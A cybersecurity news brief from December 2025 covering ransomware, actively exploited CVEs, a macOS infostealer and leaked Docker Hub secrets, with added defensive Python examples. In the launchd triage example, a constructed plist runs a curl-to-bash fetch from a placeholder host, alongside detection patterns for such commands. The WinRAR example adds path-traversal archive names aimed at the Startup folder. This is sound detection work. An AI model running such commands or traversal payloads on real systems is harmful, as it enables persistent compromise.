Svoboda Cybersecurity Brief December 11, 2025
Akira Ransomware Group Extorts $250 Million in Payouts
The Akira ransomware group, linked to the Conti cybercrime gang, has collected roughly $250 million in ransom payments, mostly from small and mid-sized organizations in manufacturing, education, IT, and healthcare. The group gains initial access through VPNs and remote-access tools and has been observed exfiltrating data within two hours of intrusion.
Source: DataBreaches
Ukrainian Hacker Charged for Aiding Russian Hacktivist Groups
Victoria Dubranova, a Ukrainian national, was indicted for aiding the Russian state-backed groups CyberArmyofRussia_Reborn (CARR) and NoName057(16) in attacks on US critical infrastructure, including water systems and election infrastructure. She faces up to 27 years in prison if convicted.
Source: SecurityWeek
WinRAR Path Traversal Flaw (CVE-2025-6218) Actively Exploited
CISA added CVE-2025-6218 to its Known Exploited Vulnerabilities (KEV) catalog after exploitation by groups including Bitter APT and Gamaredon. A crafted archive causes files to be written into the Windows Startup folder, giving attackers code execution at the next logon. Fixed in WinRAR 7.12.
Impact: Code execution via malicious archives, persisting across logons.
Mitigation: Update to WinRAR 7.12 or later.
Source: The Hacker News
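The bug class behind this item is an extractor honouring a member name that resolves outside the chosen destination; the Startup folder is the payoff because anything dropped there runs at the next logon. The following is an added example (not WinRAR's code and not from the advisory) of the check a mail gateway or extraction wrapper would apply to member names before writing anything: it normalizes a name the way a Windows extractor sees it (either separator, drive letters, UNC prefixes, `..` components) and reports whether it escapes the destination and whether it lands in a Startup folder. The names in the usage lines are constructed.

```python
"""Classify archive member names before extraction (added example)."""
import posixpath

# Per-user and all-users Startup locations, lower-cased, as path suffix fragments.
STARTUP_DIRS = (
    "appdata/roaming/microsoft/windows/start menu/programs/startup/",
    "programdata/microsoft/windows/start menu/programs/startup/",
)


def normalize(name: str) -> str:
    """Collapse '.' and '..' components, treating '\\' and '/' alike as Windows does."""
    return posixpath.normpath(name.replace("\\", "/"))


def escapes_destination(name: str) -> bool:
    """True if extracting `name` relative to a directory would write outside it."""
    n = name.replace("\\", "/")
    if n.startswith("/"):            # absolute path or UNC (//server/share)
        return True
    if len(n) >= 2 and n[1] == ":":  # drive-letter path (C:\...)
        return True
    norm = posixpath.normpath(n)
    # After normalization any surviving leading '..' means the path climbs out.
    return norm == ".." or norm.startswith("../")


def targets_startup_folder(name: str) -> bool:
    """True if the normalized name points into a Windows Startup folder."""
    return any(d in normalize(name).lower() for d in STARTUP_DIRS)


def classify(name: str) -> str:
    """Return 'ok', 'traversal', or 'traversal-startup' for one member name."""
    if not escapes_destination(name):
        return "ok"
    return "traversal-startup" if targets_startup_folder(name) else "traversal"


if __name__ == "__main__":
    # Constructed member names, not taken from any real sample.
    for member in (
        "docs/readme.txt",
        "foo/../../bar.txt",
        "C:\\Windows\\evil.exe",
        "..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk",
    ):
        print(f"{classify(member):18} {member}")
```

Anything other than `ok` should abort the extraction; the check is deliberately independent of where the user chose to extract, since that is what the attacker does not control.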
Google Ads Distribute macOS Infostealer via Fake AI Guides
Malicious Google ads send users to ChatGPT and Grok conversation pages that pose as setup guides and instruct them to paste commands into the macOS Terminal, installing the AMOS infostealer. The stealer harvests crypto wallets, browser data, and credentials and persists via a LaunchDaemon.
Source: BleepingComputer
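Persistence through launchd is the durable part of this chain, so it is the part worth hunting for. The following is an added example (not the report's material and not AMOS code) of a triage routine for LaunchDaemon and LaunchAgent plists: it parses each plist with the standard `plistlib` module and flags program arguments that look like a pasted installer (an inline shell command, curl piped to an interpreter, base64 decoding, osascript, or a payload under a world-writable path), plus the RunAtLoad-and-KeepAlive combination that keeps such a job resident. The two plists are constructed for the example.

```python
"""Triage launchd plists for stealer-style persistence (added example)."""
import plistlib
import re
from typing import List

# (pattern, label) pairs; each is a heuristic, not proof of compromise.
INDICATORS = [
    (re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"), "curl piped to shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode|-D)\b"), "base64 decode"),
    (re.compile(r"\bosascript\b"), "osascript"),
    (re.compile(r"\b(ba|z)?sh\s+-c\b"), "inline shell command"),
    (re.compile(r"/tmp/|/private/tmp/|/Users/Shared/"), "world-writable path"),
]


def triage(plist_bytes: bytes) -> List[str]:
    """Return the indicator labels that fire for one launchd plist."""
    doc = plistlib.loads(plist_bytes)
    # A job runs either ProgramArguments (argv list) or a bare Program path.
    cmd = " ".join(doc.get("ProgramArguments", [])) or str(doc.get("Program", ""))
    hits = [label for pat, label in INDICATORS if pat.search(cmd)]
    # Stealers tend to both start at load and ask launchd to restart them.
    if doc.get("RunAtLoad") and doc.get("KeepAlive"):
        hits.append("RunAtLoad+KeepAlive")
    return hits


# Constructed samples (serialized with plistlib so the XML is well-formed).
BENIGN = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
    "StartCalendarInterval": {"Hour": 2},
})
SUSPECT = plistlib.dumps({
    "Label": "com.apple.update.helper",  # Apple-looking label outside /System is itself a smell
    "ProgramArguments": ["/bin/bash", "-c", "curl -fsSL http://example.invalid/p | bash"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    for name, data in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, triage(data))
```

On a real host, feed it every file under /Library/LaunchDaemons, /Library/LaunchAgents, and ~/Library/LaunchAgents; an empty list is only a negative for these heuristics, not a clean bill of health.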
DroidLock Android Ransomware Locks Devices for Extortion
The new DroidLock malware targets Spanish-speaking users via fake apps, locking the screen and demanding a ransom. It abuses Device Admin permissions to wipe data and change PINs, and steals lock patterns via overlay attacks.
Source: BleepingComputer
Fortinet Patches Critical SAML Auth Bypass (CVE-2025-59718/9)
FortiOS, FortiProxy, and FortiWeb are vulnerable to SAML signature spoofing, allowing unauthenticated access when FortiCloud SSO is enabled. Disabling FortiCloud SSO is a temporary workaround until fixed versions are applied.
Impact: Full system compromise.
Mitigation: Disable FortiCloud SSO or update to fixed versions.
Source: SecurityWeek
React2Shell Exploits RSC Flaw to Deploy Linux Malware
Attackers exploit CVE-2025-55182, a React Server Components (RSC) vulnerability, to deliver the PeerBlight backdoor, CowTunnel proxy, and ZinFoq implant. Construction and entertainment organizations are targeted using automated tooling.
Source: The Hacker News
10,000 Docker Hub Images Expose Credentials and API Keys
Flare found 10,456 images leaking secrets, including around 4,000 AI model API keys (OpenAI, HuggingFace) and cloud credentials; 42% of the images exposed five or more sensitive values.
Source: BleepingComputer
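Most of these leaks arrive through ENV instructions and files committed into layers, which means they are visible in the image config JSON and Dockerfile history long before anyone needs to pull a layer. The following is an added example (not Flare's tooling) of the scan a CI gate or registry audit would run over that text: it matches common credential formats (AWS access key IDs, OpenAI- and HuggingFace-style tokens, GitHub tokens) and adds a Shannon-entropy check for generic high-entropy values assigned to secret-looking variable names, masking each hit so the report does not re-leak it. The sample is constructed; the AWS value is the placeholder key from AWS's own documentation.

```python
"""Scan image config/ENV text for credential-shaped values (added example)."""
import math
import re
from typing import List, Tuple

# Known token formats. Prefix-based matches are cheap and low-noise.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("openai_key", re.compile(r"\bsk-[A-Za-z0-9_-]{20,}\b")),
    ("huggingface_token", re.compile(r"\bhf_[A-Za-z0-9]{30,}\b")),
    ("github_token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b")),
]
# Variable names that usually carry secrets; the value is group 2.
SECRET_NAME = re.compile(r"(?i)(secret|token|password|passwd|api[_-]?key)\s*=\s*(\S+)")
ENTROPY_BITS = 3.5   # bits per character; prose and slug-style values sit below this
MIN_LEN = 16


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def mask(value: str) -> str:
    """Keep a 4-character prefix so the finding is recognizable but not reusable."""
    return value[:4] + "*" * (len(value) - 4)


def scan(text: str) -> List[Tuple[str, str]]:
    """Return (kind, masked_value) findings for each line of Dockerfile/config text."""
    findings = []
    for line in text.splitlines():
        seen = set()
        for kind, pat in PATTERNS:
            for m in pat.finditer(line):
                findings.append((kind, mask(m.group(0))))
                seen.add(m.group(0))
        m = SECRET_NAME.search(line)
        if m:
            value = m.group(2).strip("'\"")
            # Generic check only for values no format pattern already claimed.
            if value not in seen and len(value) >= MIN_LEN and entropy(value) >= ENTROPY_BITS:
                findings.append(("high_entropy_value", mask(value)))
    return findings


# Constructed Dockerfile fragment; no real credentials.
SAMPLE = """\
ENV NODE_ENV=production
ENV AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
ENV OPENAI_API_KEY=sk-proj-abcdefghijklmnopqrstuvwxyz0123456789
ENV HF_TOKEN=hf_abcdefghijklmnopqrstuvwxyzABCDEFGHIJ
ENV APP_SECRET=correct-horse-battery
ENV DB_PASSWORD=9f2b6c1e4a8d7b3f0c5e2a9d1b4f7c8e
"""

if __name__ == "__main__":
    for kind, value in scan(SAMPLE):
        print(f"{kind:20} {value}")
```

The entropy threshold is the knob to tune: `correct-horse-battery` is below 3.5 bits per character and is not flagged, while the 32-character hex value is above it. To apply this to a pulled image, run it over `docker image inspect` output and each layer's file listing rather than only the Dockerfile.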
SAP Fixes Critical Code Injection in Solution Manager
CVE-2025-42880 (CVSS 9.9) allows authenticated attackers to execute arbitrary code in SAP Solution Manager. Critical due to its central role in enterprise environments.
Impact: Full system takeover.
Mitigation: Apply SAP patches ASAP.
Source: SecurityWeek
Ivanti EPM Vulnerabilities Allow RCE via XSS (CVE-2025-10573)
A critical stored XSS flaw in Ivanti EPM lets attackers hijack admin sessions via crafted device scan data. Three high-severity RCE flaws were also patched.
Impact: Unauthenticated RCE.
Mitigation: Update to 2024 SU4 SR1.
Source: SecurityWeek
Teen Arrested for Stealing 64M Records from Spanish Firms
A 19-year-old in Spain stole DNI numbers, IBANs, and addresses from nine companies and sold the data on hacker forums, using six accounts and five pseudonyms to distribute it.
Source: DataBreaches
PCIe IDE Flaws (CVE-2025-9612/3/4) Affect Intel/AMD CPUs
Three low-severity flaws in the PCIe 6.0 IDE (Integrity and Data Encryption) protocol could allow data corruption or denial of service by an attacker with physical access. Intel Xeon 6 and AMD EPYC 9005 processors are confirmed affected.
Impact: Stale data consumption.
Mitigation: Apply firmware updates.
Source: The Hacker News
Microsoft Teams to Flag Suspicious External Domain Traffic
The new External Domains Anomalies Report flags spikes in messaging with untrusted external domains, helping detect phishing and data exfiltration. It rolls out in February 2026.
Source: BleepingComputer
Spiderman Phishing Kit Targets European Banks
The modular kit creates pixel-perfect clones of Deutsche Bank, ING, and PayPal login pages to capture PhotoTAN and OTP codes. It is linked to a 750-member Signal group.
Source: BleepingComputer
Hidden Metadata Exposes UK Hospital Staff Absence Data
Royal Cornwall Hospital accidentally published hidden spreadsheet columns in a Freedom of Information response, revealing 8,100 staff absence records over three years.
Source: DataBreaches
Share this brief: https://svo.bz/tpAc